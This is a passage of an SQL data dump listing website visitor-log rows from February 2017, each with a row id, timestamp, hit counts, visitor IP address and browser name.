1,0,0,'46.175.144.19','chrome'),(87357,1486479096,1,1,0,0,'130.193.50.34','other'),(87358,1486479513,1,0,1,0,'68.180.228.230',''),(87359,1486479707,1,1,0,0,'91.196.178.70','chrome'),(87360,1486479737,1,1,0,0,'46.201.227.36','chrome'),(87361,1486482019,1,1,0,0,'141.8.142.61','other'),(87362,1486482423,1,1,0,0,'91.231.229.31','chrome'),(87363,1486482702,1,1,0,0,'91.196.178.38','firefox'),(87364,1486482802,1,1,0,0,'141.8.183.25','other'),(87365,1486483365,1,1,0,0,'163.172.64.184','other'),(87366,1486483526,1,0,1,0,'68.180.228.230',''),(87367,1486483701,1,0,1,0,'68.180.229.62',''),(87368,1486483715,1,1,0,0,'5.255.253.67','other'),(87369,1486484282,1,1,0,0,'141.8.142.175','other'),(87370,1486484304,1,1,0,0,'51.39.215.3','firefox'),(87371,1486484903,1,1,0,0,'141.8.142.58','other'),(87372,1486484926,1,0,1,0,'66.249.64.183',''),(87373,1486485379,1,1,0,0,'91.196.178.66','firefox'),(87374,1486485383,1,1,0,0,'178.95.244.154','chrome'),(87375,1486487857,1,0,1,0,'66.249.64.179',''),(87376,1486488294,1,1,0,0,'66.249.64.179','chrome'),(87377,1486488298,1,1,0,0,'66.249.64.61','chrome'),(87378,1486488375,1,1,0,0,'207.46.13.55','other'),(87379,1486489405,1,1,0,0,'180.76.15.163','other'),(87380,1486489684,1,0,1,0,'66.249.64.187',''),(87381,1486489983,1,1,0,0,'46.165.197.142','other'),(87382,1486492264,1,1,0,0,'46.211.205.151','chrome'),(87383,1486493037,1,0,1,0,'66.249.64.61',''),(87384,1486495064,2,0,2,0,'66.249.64.183',''),(87385,1486495376,1,1,0,0,'91.196.178.101','chrome'),(87386,1486495529,1,0,1,0,'68.180.229.62',''),(87387,1486496915,1,1,0,0,'92.113.126.94','firefox'),(87388,1486497655,4,4,0,0,'93.180.64.220','other'),(87389,1486498715,1,1,0,0,'91.196.178.162','chrome'),(87390,1486498992,1,1,0,0,'46.211.65.199','chrome'),(87391,1486499163,2,2,0,0,'93.180.64.220','other'),(87392,1486499552,1,1,0,0,'91.196.178.163','chrome'),(87393,1486500229,1,1,0,0,'207.46.13.55','other'),(87394,1486500882,1,1,0,0,'82.145.220.77','opera'),(87395,1486501527,1,1,0,0,'46.202.71.154','chrome'),(87396,1486501570,1,1,0,0,'91.196.178.35','chrome'),(87397,1486504794,1,0,1,0,'66.249.64.61',''),(87398,1486507752,1,1,0,0,'207.46.13.152','other'),(87399,1486507855,1,0,1,0,'66.249.64.179',''),(87400,1486509590,1,1,0,0,'207.46.13.77','other'),(87401,1486509710,1,1,0,0,'207.46.13.55','other'),(87402,1486510230,1,1,0,0,'188.163.108.232','chrome'),(87403,1486511932,1,0,1,0,'66.249.64.183',''),(87404,1486512268,1,1,0,0,'163.172.64.253','other'),(87405,1486512526,1,1,0,0,'163.172.64.185','other'),(87406,1486514634,2,0,2,0,'66.249.64.183',''),(87407,1486515689,8,8,0,0,'213.239.206.70','other'),(87408,1486516362,1,1,0,0,'207.46.13.77','other'),(87409,1486517109,1,0,1,0,'66.249.64.179',''),(87410,1486517945,1,1,0,0,'130.193.51.19','other'),(87411,1486518392,2,0,2,0,'66.249.64.183',''),(87412,1486518812,1,1,0,0,'130.193.50.34','other'),(87413,1486523077,1,1,0,0,'180.76.15.24','other'),(87414,1486524738,1,1,0,0,'207.46.13.152','other'),(87415,1486525427,1,0,1,0,'66.249.64.187',''),(87416,1486525817,1,1,0,0,'163.172.64.254','other'),(87417,1486528343,1,0,1,0,'66.249.64.61',''),(87418,1486529674,1,1,0,0,'163.172.64.237','other'),(87419,1486531905,1,0,1,0,'66.249.64.187',''),(87420,1486532225,1,1,0,0,'91.196.178.67','firefox'),(87421,1486532710,1,1,0,0,'5.255.253.9','other'),(87422,1486532713,1,1,0,0,'93.158.152.75','other'),(87423,1486532738,1,1,0,0,'141.8.184.11','other'),(87424,1486532741,2,2,0,0,'141.8.142.58','other'),(87425,1486532746,1,1,0,0,'141.8.132.41','other'),(87426,1486532749,1,1,0,0,'141.8.183.25','other'),(87427,1486533370,1,1,0,0,'130.193.50.4','other'),(87428,1486533468,1,1,0,0,'5.255.253.68','other'),(87429,1486533770,1,1,0,0,'46.211.250.28','chrome'),(87430,1486533972,1,0,1,0,'68.180.229.62',''),(87431,1486534391,1,1,0,0,'91.196.178.69','firefox'),(87432,1486534471,1,1,0,0,'91.196.178.66','firefox'),(87433,1486535522,2,2,0,0,'91.196.178.66','firefox'),(87434,1486535745,1,1,0,0,'180.76.15.17','other'),(87435,1486536945,1,1,0,0,'141.8.132.52','other'),(87436,1486537136,1,1,0,0,'66.249.93.157','chrome'),(87437,1486537832,1,1,0,0,'141.8.142.85','other'),(87438,1486538005,1,1,0,0,'141.8.132.41','other'),(87439,1486539267,1,1,0,0,'141.0.12.131','chrome'),(87440,1486539452,1,1,0,0,'46.211.248.60','other'),(87441,1486539836,1,1,0,0,'141.8.132.41','other'),(87442,1486540665,1,1,0,0,'91.196.178.66','firefox'),(87443,1486541652,1,0,1,0,'66.249.64.57',''),(87444,1486541669,1,1,0,0,'91.196.177.26','chrome'),(87445,1486541905,1,1,0,0,'66.249.64.187','chrome'),(87446,1486542048,1,1,0,0,'5.255.253.68','other'),(87447,1486542369,2,2,0,0,'141.8.142.58','other'),(87448,1486542594,2,2,0,0,'94.178.222.16','firefox'),(87449,1486543051,3,3,0,0,'91.196.177.46','chrome'),(87450,1486543250,1,0,1,0,'66.249.64.183',''),(87451,1486543480,1,1,0,0,'91.196.178.72','chrome'),(87452,1486543489,1,1,0,0,'91.196.178.130','firefox'),(87453,1486543783,2,2,0,0,'130.193.50.34','other'),(87454,1486544451,1,1,0,0,'46.63.111.44','chrome'),(87455,1486544532,1,1,0,0,'37.54.180.221','chrome'),(87456,1486545071,1,1,0,0,'46.219.242.161','chrome'),(87457,1486545518,1,1,0,0,'130.193.50.34','other'),(87458,1486545783,1,1,0,0,'130.193.51.19','other'),(87459,1486547161,1,1,0,0,'130.180.216.210','firefox'),(87460,1486547168,1,1,0,0,'194.37.248.11','chrome'),(87461,1486547182,1,1,0,0,'80.254.155.43','chrome'),(87462,1486547188,2,2,0,0,'141.8.183.25','other'),(87463,1486547236,1,1,0,0,'141.8.142.175','other'),(87464,1486547302,1,0,1,0,'66.249.64.187',''),(87465,1486547597,1,1,0,0,'37.52.23.154','chrome'),(87466,1486548353,1,0,1,0,'66.249.64.179',''),(87467,1486548891,1,1,0,0,'207.46.13.73','other'),(87468,1486548966,3,3,0,0,'130.193.50.34','other'),(87469,1486549321,1,1,0,0,'37.57.131.55','opera'),(87470,1486549738,1,1,0,0,'141.8.142.61','other'),(87471,1486549751,2,2,0,0,'94.179.16.46','firefox'),(87472,1486549919,1,1,0,0,'130.193.50.34','other'),(87473,1486549983,1,1,0,0,'130.193.51.19','other'),(87474,1486550143,1,1,0,0,'207.46.13.73','other'),(87475,1486550597,1,1,0,0,'193.194.127.217','firefox'),(87476,1486551360,1,1,0,0,'37.52.23.154','chrome'),(87477,1486551391,1,1,0,0,'91.196.178.72','chrome'),(87478,1486552366,1,0,1,0,'66.249.64.183',''),(87479,1486553072,1,0,1,0,'66.249.64.61',''),(87480,1486553096,1,1,0,0,'79.111.143.142','chrome'),(87481,1486553171,3,3,0,0,'5.9.79.151','other'),(87482,1486553490,1,1,0,0,'193.150.58.101','chrome'),(87483,1486553630,1,1,0,0,'92.113.142.161','chrome'),(87484,1486553755,1,0,1,0,'66.249.64.179',''),(87485,1486553829,1,0,1,0,'66.249.64.183',''),(87486,1486555121,1,0,1,0,'66.249.64.183',''),(87487,1486555176,1,1,0,0,'141.8.132.10','other'),(87488,1486555202,1,1,0,0,'91.196.178.34','chrome'),(87489,1486555229,1,1,0,0,'141.8.142.61','other'),(87490,1486555492,1,1,0,0,'141.8.142.175','other'),(87491,1486555589,1,1,0,0,'130.193.50.34','other'),(87492,1486555713,1,1,0,0,'130.193.51.19','other'),(87493,1486555826,1,1,0,0,'141.8.183.25','other'),(87494,1486555843,2,2,0,0,'141.8.142.58','other'),(87495,1486556157,1,1,0,0,'91.196.178.65','firefox'),(87496,1486556827,1,1,0,0,'37.55.150.87','chrome'),(87497,1486557045,1,1,0,0,'91.124.27.56','firefox'),(87498,1486557083,1,1,0,0,'130.193.51.19','other'),(87499,1486557230,1,1,0,0,'5.255.253.68','other'),(87500,1486557373,2,2,0,0,'130.193.50.34','other'),(87501,1486557377,1,1,0,0,'141.8.142.175','other'),(87502,1486557447,1,1,0,0,'207.46.13.152','other'),(87503,1486558544,1,1,0,0,'91.196.178.66','firefox'),(87504,1486558609,1,1,0,0,'130.193.50.34','other'),(87505,1486559862,1,1,0,0,'66.249.64.57','chrome'),(87506,1486559968,1,1,0,0,'163.172.64.183','other'),(87507,1486560975,1,1,0,0,'193.19.152.77','firefox'),(87508,1486561214,1,1,0,0,'141.8.183.25','other'),(87509,1486561465,2,2,0,0,'130.193.50.34','other'),(87510,1486561479,1,1,0,0,'5.255.253.67','other'),(87511,1486561487,1,1,0,0,'141.8.142.58','other'),(87512,1486561500,2,2,0,0,'130.193.51.19','other'),(87513,1486562035,1,1,0,0,'141.8.142.175','other'),(87514,1486562446,1,1,0,0,'141.8.142.58','other'),(87515,1486562597,1,1,0,0,'91.196.177.26','chrome'),(87516,1486563436,1,1,0,0,'46.18.0.104','chrome'),(87517,1486563606,1,1,0,0,'94.179.116.5','firefox'),(87518,1486564207,1,1,0,0,'141.8.183.25','other'),(87519,1486565334,1,1,0,0,'93.158.152.84','other'),(87520,1486565362,2,2,0,0,'141.8.142.175','other'),(87521,1486565489,1,1,0,0,'141.8.183.25','other'),(87522,1486566044,3,3,0,0,'130.193.50.34','other'),(87523,1486566374,1,1,0,0,'92.113.48.170','chrome'),(87524,1486566390,3,3,0,0,'141.8.142.175','other'),(87525,1486566559,3,3,0,0,'130.193.51.19','other'),(87526,1486567159,3,3,0,0,'130.193.50.34','other'),(87527,1486567262,2,2,0,0,'141.8.183.25','other'),(87528,1486567393,1,1,0,0,'91.196.178.38','firefox'),(87529,1486567860,1,1,0,0,'180.76.15.12','other'),(87530,1486568103,1,1,0,0,'141.8.142.175','other'),(87531,1486568242,2,2,0,0,'130.193.50.34','other'),(87532,1486568388,1,1,0,0,'130.193.51.19','other'),(87533,1486568780,1,1,0,0,'141.8.142.58','other'),(87534,1486569441,1,1,0,0,'91.196.178.66','chrome'),(87535,1486569718,1,1,0,0,'91.196.178.162','chrome'),(87536,1486569721,1,1,0,0,'163.172.64.180','other'),(87537,1486572339,1,1,0,0,'77.54.229.66','firefox'),(87538,1486572655,1,1,0,0,'130.193.50.34','other'),(87539,1486575530,1,1,0,0,'176.122.106.35','chrome'),(87540,1486576269,1,1,0,0,'95.132.134.62','chrome'),(87541,1486577212,2,0,2,0,'68.180.228.230',''),(87542,1486581119,1,0,1,0,'66.249.64.183',''),(87543,1486581130,1,0,1,0,'66.249.64.57',''),(87544,1486582551,1,1,0,0,'46.211.136.126','chrome'),(87545,1486582779,1,1,0,0,'91.196.178.104','firefox'),(87546,1486583054,1,1,0,0,'91.196.178.71','chrome'),(87547,1486583208,1,0,1,0,'66.249.64.57',''),(87548,1486584174,1,0,1,0,'66.249.64.187',''),(87549,1486584451,1,0,1,0,'66.249.64.179',''),(87550,1486590456,1,1,0,0,'207.46.13.55','other'),(87551,1486590945,1,1,0,0,'78.111.187.54','chrome'),(87552,1486595917,1,1,0,0,'138.197.90.133','other'),(87553,1486597609,1,1,0,0,'5.9.106.230','other'),(87554,1486598282,1,1,0,0,'207.46.13.55','other'),(87555,1486600199,1,1,0,0,'163.172.64.245','other'),(87556,1486602536,1,1,0,0,'141.8.184.6','other'),(87557,1486604646,1,1,0,0,'141.8.142.60','other'),(87558,1486604890,1,1,0,0,'141.8.132.74','other'),(87559,1486605376,1,1,0,0,'141.8.142.200','other'),(87560,1486607113,1,1,0,0,'207.46.13.73','other'),(87561,1486608617,1,1,0,0,'93.180.64.220','other'),(87562,1486609385,2,2,0,0,'141.8.184.31','other'),(87563,1486610153,1,1,0,0,'93.180.64.220','other'),(87564,1486610602,1,1,0,0,'141.8.142.55','other'),(87565,1486610670,1,1,0,0,'130.193.50.22','other'),(87566,1486611309,1,1,0,0,'83.149.126.98','other'),(87567,1486612194,1,1,0,0,'93.158.152.66','other'),(87568,1486614374,1,1,0,0,'93.158.152.66','other'),(87569,1486614705,1,1,0,0,'141.8.142.55','other'),(87570,1486615266,1,1,0,0,'180.76.15.32','other'),(87571,1486616115,1,0,1,0,'66.249.64.183',''),(87572,1486616574,1,1,0,0,'141.8.184.31','other'),(87573,1486617247,1,1,0,0,'141.8.142.140','other'),(87574,1486617263,1,1,0,0,'141.8.142.55','other'),(87575,1486617961,1,1,0,0,'141.8.142.60','other'),(87576,1486618364,2,2,0,0,'141.8.142.140','other'),(87577,1486618912,1,1,0,0,'91.196.178.71','firefox'),(87578,1486619106,1,1,0,0,'141.8.142.60','other'),(87579,1486620785,1,0,1,0,'66.249.64.183',''),(87580,1486621508,1,1,0,0,'130.193.50.34','other'),(87581,1486621752,1,1,0,0,'82.145.222.118','chrome'),(87582,1486621801,1,1,0,0,'141.8.142.175','other'),(87583,1486622201,1,1,0,0,'94.179.116.5','firefox'),(87584,1486622374,1,1,0,0,'66.249.93.91','chrome'),(87585,1486622376,1,1,0,0,'141.8.183.25','other'),(87586,1486623040,1,1,0,0,'141.8.142.175','other'),(87587,1486623101,1,1,0,0,'141.8.142.58','other'),(87588,1486623435,3,3,0,0,'130.193.50.34','other'),(87589,1486623786,1,1,0,0,'37.53.229.30','firefox'),(87590,1486624129,1,1,0,0,'141.8.183.25','other'),(87591,1486624190,1,1,0,0,'141.8.142.58','other'),(87592,1486624597,1,1,0,0,'93.158.152.84','other'),(87593,1486625321,1,1,0,0,'91.196.178.66','firefox'),(87594,1486625717,1,1,0,0,'94.179.116.5','firefox'),(87595,1486626519,1,1,0,0,'91.196.178.164','chrome'),(87596,1486627375,1,1,0,0,'5.58.129.21','chrome'),(87597,1486627835,1,1,0,0,'95.135.232.199','chrome'),(87598,1486627990,5,5,0,0,'46.4.0.246','other'),(87599,1486628127,1,1,0,0,'40.77.167.8','other'),(87600,1486628649,1,1,0,0,'91.196.178.129','firefox'),(87601,1486629309,1,1,0,0,'93.78.238.68','chrome'),(87602,1486629342,1,1,0,0,'130.193.50.34','other'),(87603,1486629932,1,0,1,0,'66.249.64.183',''),(87604,1486630099,1,1,0,0,'40.77.167.8','other'),(87605,1486631099,1,1,0,0,'195.62.14.74','chrome'),(87606,1486631458,1,0,1,0,'66.249.64.183',''),(87607,1486631570,1,1,0,0,'95.135.44.159','firefox'),(87608,1486631571,1,1,0,0,'91.196.178.164','chrome'),(87609,1486632620,1,1,0,0,'91.196.178.66','firefox'),(87610,1486632842,1,1,0,0,'178.92.227.244','chrome'),(87611,1486633311,1,1,0,0,'40.77.167.8','other'),(87612,1486633944,1,1,0,0,'178.92.227.244','chrome'),(87613,1486636371,1,1,0,0,'204.79.180.169','msie'),(87614,1486636703,2,2,0,0,'130.193.50.34','other'),(87615,1486636723,1,1,0,0,'141.8.142.175','other'),(87616,1486636741,2,2,0,0,'141.8.183.25','other'),(87617,1486637474,1,1,0,0,'91.196.178.71','firefox'),(87618,1486637939,1,1,0,0,'37.52.145.227','chrome'),(87619,1486638078,1,0,1,0,'66.249.64.179',''),(87620,1486638388,1,1,0,0,'91.196.178.71','firefox'),(87621,1486640239,1,0,1,0,'66.249.64.187',''),(87622,1486640681,1,1,0,0,'40.77.167.7','other'),(87623,1486641329,1,1,0,0,'91.196.177.46','chrome'),(87624,1486644204,1,1,0,0,'130.180.218.189','firefox'),(87625,1486644619,1,1,0,0,'195.49.151.99','chrome'),(87626,1486644642,1,1,0,0,'141.8.142.58','other'),(87627,1486646051,1,0,1,0,'66.249.64.179',''),(87628,1486646364,1,1,0,0,'46.201.252.196','chrome'),(87629,1486646546,1,1,0,0,'91.196.177.26','chrome'),(87630,1486646881,1,1,0,0,'91.196.178.72','chrome'),(87631,1486647161,1,1,0,0,'91.231.229.31','chrome'),(87632,1486647562,1,1,0,0,'46.219.242.178','chrome'),(87633,1486647590,1,1,0,0,'130.193.50.4','other'),(87634,1486647825,2,2,0,0,'91.196.178.65','chrome'),(87635,1486648986,1,1,0,0,'130.180.212.134','chrome'),(87636,1486649014,1,1,0,0,'130.193.51.19','other'),(87637,1486649389,1,1,0,0,'37.53.229.30','firefox'),(87638,1486650201,1,1,0,0,'178.251.111.188','chrome'),(87639,1486651069,1,1,0,0,'5.255.253.47','other'),(87640,1486651452,1,1,0,0,'207.46.13.73','other'),(87641,1486651644,1,1,0,0,'91.196.178.163','chrome'),(87643,1486651695,1,1,0,0,'91.196.178.66','firefox'),(87644,1486651707,1,1,0,0,'94.179.82.155','chrome'),(87645,1486652174,1,1,0,0,'66.249.64.57','chrome'),(87646,1486652188,1,1,0,0,'66.249.64.183','chrome'),(87647,1486652557,1,1,0,0,'91.196.178.72','other'),(87648,1486652582,1,1,0,0,'130.193.50.34','other'),(87649,1486652883,1,1,0,0,'178.214.164.159','chrome'),(87650,1486653580,2,0,2,0,'66.249.64.179',''),(87651,1486653865,1,1,0,0,'180.76.15.143','other'),(87652,1486653952,1,1,0,0,'91.196.178.71','firefox'),(87653,1486654502,1,1,0,0,'94.178.6.243','chrome'),(87654,1486657109,1,1,0,0,'66.249.64.187','chrome'),(87655,1486659913,1,0,1,0,'68.180.228.230',''),(87656,1486660821,1,1,0,0,'91.196.178.38','firefox'),(87657,1486660889,1,1,0,0,'92.113.126.94','firefox'),(87658,1486662550,1,1,0,0,'95.164.75.153','chrome'),(87659,1486663385,1,1,0,0,'92.113.126.94','firefox'),(87660,1486664187,1,1,0,0,'217.69.133.2','other'),(87661,1486665153,1,0,1,0,'66.249.64.61',''),(87662,1486666125,1,0,1,0,'66.249.64.57',''),(87663,1486667446,1,1,0,0,'163.172.64.216','other'),(87664,1486668459,1,1,0,0,'130.193.50.34','other'),(87665,1486668810,1,1,0,0,'178.212.111.36','chrome'),(87666,1486668860,1,1,0,0,'157.55.39.137','other'),(87667,1486669520,1,1,0,0,'94.179.42.70','chrome'),(87668,1486670560,1,1,0,0,'141.8.183.25','other'),(87669,1486671576,1,0,1,0,'66.249.64.183',''),(87670,1486671759,2,2,0,0,'141.8.142.58','other'),(87671,1486672177,1,1,0,0,'141.8.142.61','other'),(87672,1486673434,1,1,0,0,'46.211.252.107','chrome'),(87673,1486673538,1,1,0,0,'141.8.142.61','other'),(87674,1486673542,1,1,0,0,'130.193.51.74','other'),(87675,1486673546,1,1,0,0,'141.8.142.175','other'),(87676,1486673629,1,1,0,0,'5.255.253.47','other'),(87677,1486673633,1,1,0,0,'141.8.183.19','other'),(87678,1486674783,1,1,0,0,'141.8.132.2','other'),(87679,1486675665,2,2,0,0,'130.193.51.19','other'),(87680,1486676623,1,1,0,0,'130.193.50.34','other'),(87681,1486676627,1,0,1,0,'66.249.64.183',''),(87682,1486676699,1,0,1,0,'66.249.64.179',''),(87683,1486676857,1,1,0,0,'141.8.142.67','other'),(87684,1486677467,2,2,0,0,'141.8.183.25','other'),(87685,1486677596,1,1,0,0,'130.193.51.19','other'),(87686,1486677659,1,1,0,0,'141.8.142.175','other'),(87687,1486678236,2,2,0,0,'130.193.50.34','other'),(87688,1486679153,1,0,1,0,'68.180.228.230',''),(87689,1486679241,1,1,0,0,'130.193.50.34','other'),(87690,1486680292,1,1,0,0,'46.202.97.200','chrome'),(87691,1486680352,3,3,0,0,'121.42.205.30','other'),(87692,1486681985,1,1,0,0,'46.202.97.200','chrome'),(87693,1486682934,1,0,1,0,'68.180.229.62',''),(87694,1486683884,2,2,0,0,'130.193.50.34','other'),(87695,1486684125,1,1,0,0,'141.8.142.175','other'),(87696,1486684288,1,1,0,0,'130.193.51.19','other'),(87697,1486685394,1,1,0,0,'130.193.50.34','other'),(87698,1486685419,1,0,1,0,'66.249.64.187',''),(87699,1486685838,1,0,1,0,'66.249.64.183',''),(87700,1486686002,1,0,1,0,'66.249.64.59',''),(87701,1486687501,1,0,1,0,'66.249.64.183',''),(87702,1486687546,1,1,0,0,'180.76.15.23','other'),(87703,1486687678,1,0,1,0,'66.249.64.57',''),(87704,1486688894,1,1,0,0,'163.172.64.180','other'),(87705,1486690797,1,0,1,0,'66.249.64.61',''),(87706,1486690866,1,1,0,0,'163.172.71.225','other'),(87707,1486691095,1,1,0,0,'92.63.91.84','firefox'),(87708,1486691573,1,1,0,0,'130.193.50.34','other'),(87709,1486691843,1,1,0,0,'157.55.39.137','other'),(87710,1486691920,1,1,0,0,'180.76.15.155','other'),(87711,1486692453,1,1,0,0,'141.8.183.25','other'),(87712,1486694910,1,0,1,0,'66.249.64.59',''),(87713,1486696749,1,1,0,0,'217.69.133.169','firefox'),(87714,1486697137,1,1,0,0,'141.8.142.58','other'),(87715,1486697269,1,1,0,0,'141.8.142.175','other'),(87716,1486697659,1,1,0,0,'66.249.64.61','chrome'),(87717,1486697661,1,1,0,0,'66.249.64.57','chrome'),(87718,1486700175,1,0,1,0,'66.249.64.59',''),(87719,1486700178,1,1,0,0,'5.255.253.68','other'),(87720,1486700592,1,1,0,0,'40.77.167.36','other'),(87721,1486703613,1,1,0,0,'40.77.167.36','other'),(87722,1486703686,2,2,0,0,'130.193.50.34','other'),(87723,1486704690,1,1,0,0,'93.158.152.84','other'),(87724,1486705198,1,1,0,0,'141.8.142.175','other'),(87725,1486705256,1,1,0,0,'66.249.64.59','chrome'),(87726,1486705298,1,1,0,0,'91.196.178.72','firefox'),(87727,1486705860,1,1,0,0,'163.172.64.254','other'),(87728,1486706858,2,0,2,0,'66.249.64.179',''),(87729,1486707086,1,1,0,0,'91.196.178.72','firefox'),(87730,1486707931,1,1,0,0,'130.193.50.34','other'),(87731,1486708108,2,2,0,0,'5.9.70.72','other'),(87732,1486708158,1,1,0,0,'130.193.51.19','other'),(87733,1486708252,1,1,0,0,'141.8.183.25','other'),(87734,1486708319,2,2,0,0,'141.8.142.67','other'),(87735,1486708885,1,1,0,0,'66.249.93.91','chrome'),(87736,1486708967,1,1,0,0,'91.196.178.72','chrome'),(87737,1486710368,1,1,0,0,'46.172.83.68','firefox'),(87738,1486711364,1,1,0,0,'91.196.178.66','firefox'),(87739,1486711501,2,2,0,0,'141.8.142.175','other'),(87740,1486711806,1,1,0,0,'62.210.250.212','other'),(87741,1486712239,1,1,0,0,'130.193.50.34','other'),(87742,1486712817,1,1,0,0,'130.180.216.64','firefox'),(87743,1486713157,1,1,0,0,'130.193.50.34','other'),(87744,1486713181,1,0,1,0,'66.249.64.187',''),(87745,1486713466,1,1,0,0,'82.207.49.54','chrome'),(87746,1486713525,1,1,0,0,'163.172.64.248','other'),(87747,1486713806,1,1,0,0,'163.172.64.186','other'),(87748,1486714280,1,1,0,0,'46.201.52.175','chrome'),(87749,1486714417,1,1,0,0,'178.92.227.244','chrome'),(87750,1486714602,1,1,0,0,'91.196.178.133','firefox'),(87751,1486714775,1,1,0,0,'95.134.43.6','firefox'),(87752,1486715336,1,1,0,0,'178.92.74.94','chrome'),(87753,1486715362,1,1,0,0,'163.172.64.186','other'),(87754,1486715495,1,1,0,0,'141.8.142.61','other'),(87755,1486715714,1,1,0,0,'91.196.178.66','firefox'),(87756,1486716503,2,2,0,0,'141.8.142.175','other'),(87757,1486716510,1,1,0,0,'141.8.142.58','other'),(87758,1486716597,1,0,1,0,'66.249.64.59',''),(87759,1486716907,1,1,0,0,'130.193.37.7','other'),(87760,1486718055,1,0,1,0,'66.249.64.61',''),(87761,1486718295,1,1,0,0,'66.249.64.61','chrome'),(87762,1486718308,1,1,0,0,'40.77.167.36','other'),(87763,1486718382,1,1,0,0,'130.193.50.34','other'),(87764,1486718468,1,1,0,0,'91.196.178.66','firefox'),(87765,1486718556,1,1,0,0,'141.8.142.61','other'),(87766,1486718981,1,1,0,0,'141.8.183.25','other'),(87767,1486719897,1,1,0,0,'91.196.177.26','chrome'),(87768,1486720583,1,1,0,0,'178.92.176.113','chrome'),(87769,1486721844,1,1,0,0,'91.244.30.179','chrome'),(87770,1486722085,1,1,0,0,'207.46.13.73','other'),(87771,1486722384,1,1,0,0,'141.8.142.175','other'),(87772,1486722529,1,1,0,0,'141.8.142.61','other'),(87773,1486722532,2,2,0,0,'130.193.50.34','other'),(87774,1486722535,1,1,0,0,'141.8.183.25','other'),(87775,1486722577,1,1,0,0,'91.196.178.66','firefox'),(87776,1486722933,4,4,0,0,'141.8.142.58','other'),(87777,1486722937,1,1,0,0,'93.158.152.84','other'),(87778,1486722945,1,1,0,0,'130.193.51.19','other'),(87779,1486723065,1,1,0,0,'94.178.16.195','chrome'),(87780,1486724021,1,1,0,0,'94.179.4.6','firefox'),(87781,1486724265,1,1,0,0,'95.134.202.162','firefox'),(87782,1486724766,1,1,0,0,'141.8.132.10','other'),(87783,1486724932,1,1,0,0,'46.165.197.141','other'),(87784,1486724984,1,1,0,0,'91.196.177.26','chrome'),(87785,1486725134,2,2,0,0,'141.8.142.61','other'),(87786,1486725302,1,1,0,0,'130.193.50.34','other'),(87787,1486725997,1,1,0,0,'141.8.183.25','other'),(87788,1486726271,1,1,0,0,'141.8.183.19','other'),(87789,1486726343,1,1,0,0,'91.196.178.66','chrome'),(87790,1486726353,1,1,0,0,'91.196.178.66','firefox'),(87791,1486726711,1,1,0,0,'93.158.152.84','other'),(87792,1486727268,1,1,0,0,'141.8.142.175','other'),(87793,1486727313,2,2,0,0,'141.8.142.61','other'),(87794,1486727338,1,1,0,0,'141.8.183.19','other'),(87795,1486727690,1,1,0,0,'141.8.142.58','other'),(87796,1486727830,3,3,0,0,'130.193.51.19','other'),(87797,1486727866,1,1,0,0,'207.46.13.84','other'),(87798,1486728022,1,1,0,0,'141.8.183.25','other'),(87799,1486728421,2,2,0,0,'141.8.142.175','other'),(87800,1486728688,1,1,0,0,'91.196.178.69','firefox'),(87801,1486729066,1,1,0,0,'141.8.142.61','other'),(87802,1486729237,1,1,0,0,'141.8.142.67','other'),(87803,1486729238,1,0,1,0,'66.249.64.183',''),(87804,1486729504,1,1,0,0,'91.196.178.66','firefox'),(87805,1486729574,1,1,0,0,'91.227.206.10','chrome'),(87806,1486729586,1,1,0,0,'82.207.91.234','firefox'),(87807,1486729598,1,1,0,0,'91.196.177.110','chrome'),(87808,1486729649,1,1,0,0,'91.196.178.67','chrome'),(87809,1486729695,1,1,0,0,'92.112.184.137','firefox'),(87810,1486729705,1,1,0,0,'141.8.183.25','other'),(87811,1486729711,1,1,0,0,'130.193.50.34','other'),(87812,1486729865,1,1,0,0,'91.196.178.40','chrome'),(87813,1486729929,1,1,0,0,'157.55.39.137','other'),(87814,1486730045,2,2,0,0,'93.180.64.220','other'),(87815,1486730984,1,1,0,0,'91.196.178.66','firefox'),(87816,1486731079,1,0,1,0,'66.249.64.61',''),(87817,1486732137,1,1,0,0,'94.178.16.195','chrome'),(87818,1486732523,4,4,0,0,'130.193.50.34','other'),(87819,1486732590,6,6,0,0,'141.8.142.175','other'),(87820,1486732985,1,1,0,0,'207.46.13.73','other'),(87821,1486733004,2,2,0,0,'141.8.183.25','other'),(87822,1486733967,1,1,0,0,'141.8.183.25','other'),(87823,1486733991,2,2,0,0,'141.8.142.175','other'),(87824,1486734040,1,1,0,0,'141.8.142.58','other'),(87825,1486734265,3,3,0,0,'130.193.50.34','other'),(87826,1486734700,1,1,0,0,'130.193.51.19','other'),(87827,1486734765,1,0,1,0,'68.180.228.230',''),(87828,1486735106,1,1,0,0,'178.95.199.225','chrome'),(87829,1486736024,1,1,0,0,'62.210.162.42','chrome'),(87830,1486737122,1,1,0,0,'217.69.133.226','other'),(87831,1486737685,1,0,1,0,'66.249.64.61',''),(87832,1486738054,1,1,0,0,'94.179.68.85','firefox'),(87833,1486739125,1,0,1,0,'66.249.64.179',''),(87834,1486739461,1,0,1,0,'66.249.64.187',''),(87835,1486740526,1,1,0,0,'95.134.202.106','chrome'),(87836,1486742232,1,1,0,0,'91.196.178.34','chrome'),(87837,1486742352,1,1,0,0,'91.196.178.33','chrome'),(87838,1486743133,1,0,1,0,'66.249.64.61',''),(87839,1486743744,1,1,0,0,'157.55.39.137','other'),(87840,1486744065,1,1,0,0,'130.193.51.19','other'),(87841,1486744075,4,4,0,0,'130.193.50.34','other'),(87842,1486744202,3,3,0,0,'141.8.183.25','other'),(87843,1486744278,3,3,0,0,'141.8.142.175','other'),(87844,1486744415,1,1,0,0,'141.8.142.58','other'),(87845,1486744545,1,1,0,0,'141.8.142.67','other'),(87846,1486745062,1,1,0,0,'163.172.64.178','other'),(87847,1486745102,4,4,0,0,'130.193.50.34','other'),(87848,1486745334,1,1,0,0,'141.8.142.61','other'),(87849,1486745351,2,2,0,0,'141.8.142.175','other'),(87850,1486745921,1,1,0,0,'217.69.136.210','other'),(87851,1486746258,2,2,0,0,'141.8.142.175','other'),(87852,1486746415,9,9,0,0,'130.193.50.34','other'),(87853,1486747316,1,1,0,0,'141.8.142.175','other'),(87854,1486747319,1,1,0,0,'130.193.50.34','other'),(87855,1486747538,1,1,0,0,'163.172.64.220','other'),(87856,1486748538,1,1,0,0,'91.196.178.65','firefox'),(87857,1486748843,1,1,0,0,'130.193.50.34','other'),(87858,1486750336,1,1,0,0,'180.76.15.30','other'),(87859,1486750585,1,1,0,0,'157.55.39.137','other'),(87860,1486751849,1,1,0,0,'195.238.119.45','chrome'),(87861,1486751859,1,1,0,0,'130.193.50.34','other'),(87862,1486752231,1,1,0,0,'66.249.64.183','chrome'),(87863,1486752243,1,1,0,0,'66.249.64.57','chrome'),(87864,1486752297,1,1,0,0,'157.55.39.137','other'),(87865,14